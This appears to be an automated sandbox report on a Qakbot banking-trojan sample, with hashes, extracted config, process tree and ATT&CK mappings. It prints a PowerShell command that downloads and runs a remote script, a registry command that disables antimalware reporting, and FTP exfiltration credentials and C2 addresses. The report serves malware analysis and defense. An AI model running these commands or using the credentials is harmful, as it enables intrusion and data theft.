qakbot | 6f5d3879c4a516661a93499e64d7595333fb51d6a87677de25d9b7a19b41b362

General

Target

mpver.exe
Size

36.5MB
MD5

07a25e7f4f3a756e64c07c07d82591a4
SHA1

ff3f1f7e82d1721fa0d28cad127bca6d799f40b8
SHA256

6f5d3879c4a516661a93499e64d7595333fb51d6a87677de25d9b7a19b41b362
SHA512

efd1acbc61603c810b5048d5f71cfaddba3430ecf49e6a815f76b7ffa9fc48a91e1d371986199569bc15cd8051d0a67c24e8d6c6c3303ffcac0448395233b5d4

Score

10^/10

qakbot 1515090054 banker persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Version

322.109

Campaign

1515090054

Credentials

Protocol: ftp
Host:
66.96.133.9
Port:
21
Username:
help
Password:
eT5TerAcnFe6~

Protocol: ftp
Host:
174.123.38.58
Port:
21
Username:
log@thebrainregistry.com
Password:
4BQ1MeeRAwNZEVu

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
logger@ostergift.com
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
logger@grupocrepusculo.net
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
logger@trussedup.com
Password:
RoP4Af0RKAAQ74V

C2

151.202.46.113:443

108.58.129.90:995

96.85.138.153:443

108.35.21.79:443

68.83.130.163:443

75.83.30.135:443

216.201.159.118:443

76.98.128.87:443

65.73.215.139:990

50.195.161.2:995

216.187.170.2:443

74.93.207.181:993

75.97.144.106:995

73.186.100.187:443

86.27.41.234:443

96.70.92.177:465

68.173.55.51:443

165.225.38.208:443

71.190.202.120:443

117.195.250.175:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 824 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

lugkhnfh.exelugkhnfh.exe

pid process

672 lugkhnfh.exe
800 lugkhnfh.exe
Loads dropped DLL 2 IoCs

Processes:

mpver.exe

pid process

1104 mpver.exe
1104 mpver.exe

flow	pid	process
6	824	powershell.exe

pid	process
672	lugkhnfh.exe
800	lugkhnfh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\yukyqo = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Lugkhnfhu\\lugkhnfh.exe\""	explorer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1668 PING.EXE

pid	process
1668	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

mpver.exempver.exelugkhnfh.exepowershell.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXElugkhnfh.exe

pid	process
1104	mpver.exe
1412	mpver.exe
1412	mpver.exe
672	lugkhnfh.exe
824	powershell.exe
824	powershell.exe
1996	explorer.exe
1996	explorer.exe
1136	taskhost.exe
1252	Dwm.exe
1288	Explorer.EXE
800	lugkhnfh.exe
800	lugkhnfh.exe
1996	explorer.exe
1996	explorer.exe
800	lugkhnfh.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

lugkhnfh.exe

pid process

672 lugkhnfh.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 824 powershell.exe
Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Explorer.EXE

pid process

1288 Explorer.EXE
1288 Explorer.EXE
1288 Explorer.EXE
1288 Explorer.EXE
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1288 Explorer.EXE
1288 Explorer.EXE
1288 Explorer.EXE
1288 Explorer.EXE

pid	process
672	lugkhnfh.exe

description	pid	process
Token: SeDebugPrivilege	824	powershell.exe

pid	process
1288	Explorer.EXE
1288	Explorer.EXE
1288	Explorer.EXE
1288	Explorer.EXE

pid	process
1288	Explorer.EXE
1288	Explorer.EXE
1288	Explorer.EXE
1288	Explorer.EXE

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

mpver.exelugkhnfh.execmd.exeexplorer.exe

description	pid	process	target process
PID 1104 wrote to memory of 1412	1104	mpver.exe	mpver.exe
PID 1104 wrote to memory of 1412	1104	mpver.exe	mpver.exe
PID 1104 wrote to memory of 1412	1104	mpver.exe	mpver.exe
PID 1104 wrote to memory of 1412	1104	mpver.exe	mpver.exe
PID 1104 wrote to memory of 672	1104	mpver.exe	lugkhnfh.exe
PID 1104 wrote to memory of 672	1104	mpver.exe	lugkhnfh.exe
PID 1104 wrote to memory of 672	1104	mpver.exe	lugkhnfh.exe
PID 1104 wrote to memory of 672	1104	mpver.exe	lugkhnfh.exe
PID 1104 wrote to memory of 1216	1104	mpver.exe	reg.exe
PID 1104 wrote to memory of 1216	1104	mpver.exe	reg.exe
PID 1104 wrote to memory of 1216	1104	mpver.exe	reg.exe
PID 1104 wrote to memory of 1216	1104	mpver.exe	reg.exe
PID 1104 wrote to memory of 824	1104	mpver.exe	powershell.exe
PID 1104 wrote to memory of 824	1104	mpver.exe	powershell.exe
PID 1104 wrote to memory of 824	1104	mpver.exe	powershell.exe
PID 1104 wrote to memory of 824	1104	mpver.exe	powershell.exe
PID 672 wrote to memory of 800	672	lugkhnfh.exe	lugkhnfh.exe
PID 672 wrote to memory of 800	672	lugkhnfh.exe	lugkhnfh.exe
PID 672 wrote to memory of 800	672	lugkhnfh.exe	lugkhnfh.exe
PID 672 wrote to memory of 800	672	lugkhnfh.exe	lugkhnfh.exe
PID 1104 wrote to memory of 300	1104	mpver.exe	cmd.exe
PID 1104 wrote to memory of 300	1104	mpver.exe	cmd.exe
PID 1104 wrote to memory of 300	1104	mpver.exe	cmd.exe
PID 1104 wrote to memory of 300	1104	mpver.exe	cmd.exe
PID 300 wrote to memory of 1668	300	cmd.exe	PING.EXE
PID 300 wrote to memory of 1668	300	cmd.exe	PING.EXE
PID 300 wrote to memory of 1668	300	cmd.exe	PING.EXE
PID 300 wrote to memory of 1668	300	cmd.exe	PING.EXE
PID 672 wrote to memory of 1996	672	lugkhnfh.exe	explorer.exe
PID 672 wrote to memory of 1996	672	lugkhnfh.exe	explorer.exe
PID 672 wrote to memory of 1996	672	lugkhnfh.exe	explorer.exe
PID 672 wrote to memory of 1996	672	lugkhnfh.exe	explorer.exe
PID 672 wrote to memory of 1996	672	lugkhnfh.exe	explorer.exe
PID 1996 wrote to memory of 1136	1996	explorer.exe	taskhost.exe
PID 1996 wrote to memory of 1136	1996	explorer.exe	taskhost.exe
PID 1996 wrote to memory of 1136	1996	explorer.exe	taskhost.exe
PID 1996 wrote to memory of 1252	1996	explorer.exe	Dwm.exe
PID 1996 wrote to memory of 1252	1996	explorer.exe	Dwm.exe
PID 1996 wrote to memory of 1252	1996	explorer.exe	Dwm.exe
PID 1996 wrote to memory of 1288	1996	explorer.exe	Explorer.EXE
PID 1996 wrote to memory of 1288	1996	explorer.exe	Explorer.EXE
PID 1996 wrote to memory of 1288	1996	explorer.exe	Explorer.EXE
PID 1996 wrote to memory of 800	1996	explorer.exe	lugkhnfh.exe
PID 1996 wrote to memory of 800	1996	explorer.exe	lugkhnfh.exe
PID 1996 wrote to memory of 800	1996	explorer.exe	lugkhnfh.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1288

C:\Users\Admin\AppData\Local\Temp\mpver.exe
"C:\Users\Admin\AppData\Local\Temp\mpver.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1104

C:\Users\Admin\AppData\Local\Temp\mpver.exe
"C:\Users\Admin\AppData\Local\Temp\mpver.exe" /C
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1412

C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:672

C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe" /C
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:800

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\bcaeumwwpzstdylzpruzcfrhcmn.txt'"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\mpver.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:300

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
PID:1668

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1252

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1136

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnf.dat
MD5
851b02b84f19d9f9683baa679ecef828

SHA1
ef34d84d3eaaf6b7242e289ee07ead61ebade13a

SHA256
7c9c42e3e749ac65fcaf3aa22e138e073132100bf04d33b8ba47d16074b21991

SHA512
619574042a2cf1082a3e0c81c578a5333bdc73f6e7640431d081d159e9b2fdb254ed58b01e31dfdbf33e6a38f290db9f2fb38c3bf69a4d9d6e85a5fac5f66c95

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
MD5
d5f5d00602dbac0381179962cfd5c500

SHA1
5d33d69e7d211aacf626bfad2def400ddaa66a5c

SHA256
5dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e

SHA512
ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
MD5
d5f5d00602dbac0381179962cfd5c500

SHA1
5d33d69e7d211aacf626bfad2def400ddaa66a5c

SHA256
5dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e

SHA512
ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
MD5
d5f5d00602dbac0381179962cfd5c500

SHA1
5d33d69e7d211aacf626bfad2def400ddaa66a5c

SHA256
5dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e

SHA512
ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
MD5
d5f5d00602dbac0381179962cfd5c500

SHA1
5d33d69e7d211aacf626bfad2def400ddaa66a5c

SHA256
5dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e

SHA512
ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe
MD5
d5f5d00602dbac0381179962cfd5c500

SHA1
5d33d69e7d211aacf626bfad2def400ddaa66a5c

SHA256
5dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e

SHA512
ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985

Download Submit
memory/300-105-0x0000000000000000-mapping.dmp

Download
memory/672-69-0x0000000000000000-mapping.dmp

Download
memory/800-127-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/800-128-0x00000000005E0000-0x0000000000606000-memory.dmp

Filesize
152KB

Download
memory/800-125-0x0000000001000000-0x0000000001084000-memory.dmp

Filesize
528KB

Download
memory/800-129-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download
memory/800-77-0x0000000000000000-mapping.dmp

Download
memory/824-104-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/824-91-0x00000000026F0000-0x00000000026F1000-memory.dmp

Filesize
4KB

Download
memory/824-82-0x000000001AD20000-0x000000001AD21000-memory.dmp

Filesize
4KB

Download
memory/824-83-0x000000001ACA0000-0x000000001ACA2000-memory.dmp

Filesize
8KB

Download
memory/824-84-0x000000001ACA4000-0x000000001ACA6000-memory.dmp

Filesize
8KB

Download
memory/824-85-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/824-86-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/824-87-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

Filesize
4KB

Download
memory/824-88-0x0000000002640000-0x0000000002641000-memory.dmp

Filesize
4KB

Download
memory/824-81-0x0000000002350000-0x0000000002351000-memory.dmp

Filesize
4KB

Download
memory/824-103-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/824-75-0x0000000000000000-mapping.dmp

Download
memory/824-78-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

Filesize
8KB

Download
memory/1104-60-0x0000000001000000-0x0000000001084000-memory.dmp

Filesize
528KB

Download
memory/1104-62-0x00000000002A0000-0x00000000002A6000-memory.dmp

Filesize
24KB

Download
memory/1104-59-0x0000000075EF1000-0x0000000075EF3000-memory.dmp

Filesize
8KB

Download
memory/1136-122-0x00000000776D0000-0x00000000776D1000-memory.dmp

Filesize
4KB

Download
memory/1136-115-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/1136-116-0x0000000001D00000-0x0000000001D2C000-memory.dmp

Filesize
176KB

Download
memory/1216-70-0x0000000000000000-mapping.dmp

Download
memory/1252-124-0x00000000776D0000-0x00000000776D1000-memory.dmp

Filesize
4KB

Download
memory/1252-123-0x00000000001A0000-0x00000000001CC000-memory.dmp

Filesize
176KB

Download
memory/1288-121-0x00000000776D0000-0x00000000776D1000-memory.dmp

Filesize
4KB

Download
memory/1288-118-0x0000000002960000-0x000000000298C000-memory.dmp

Filesize
176KB

Download
memory/1412-63-0x0000000000000000-mapping.dmp

Download
memory/1668-106-0x0000000000000000-mapping.dmp

Download
memory/1996-111-0x00000000000D0000-0x0000000000139000-memory.dmp

Filesize
420KB

Download
memory/1996-119-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download
memory/1996-120-0x00000000003C0000-0x0000000000440000-memory.dmp

Filesize
512KB

Download
memory/1996-117-0x0000000000490000-0x0000000000491000-memory.dmp

Filesize
4KB

Download
memory/1996-114-0x00000000003C0000-0x0000000000440000-memory.dmp

Filesize
512KB

Download
memory/1996-113-0x00000000003C0000-0x0000000000440000-memory.dmp

Filesize
512KB

Download
memory/1996-112-0x0000000000330000-0x0000000000331000-memory.dmp

Filesize
4KB

Download
memory/1996-109-0x0000000074F41000-0x0000000074F43000-memory.dmp

Filesize
8KB

Download
memory/1996-107-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads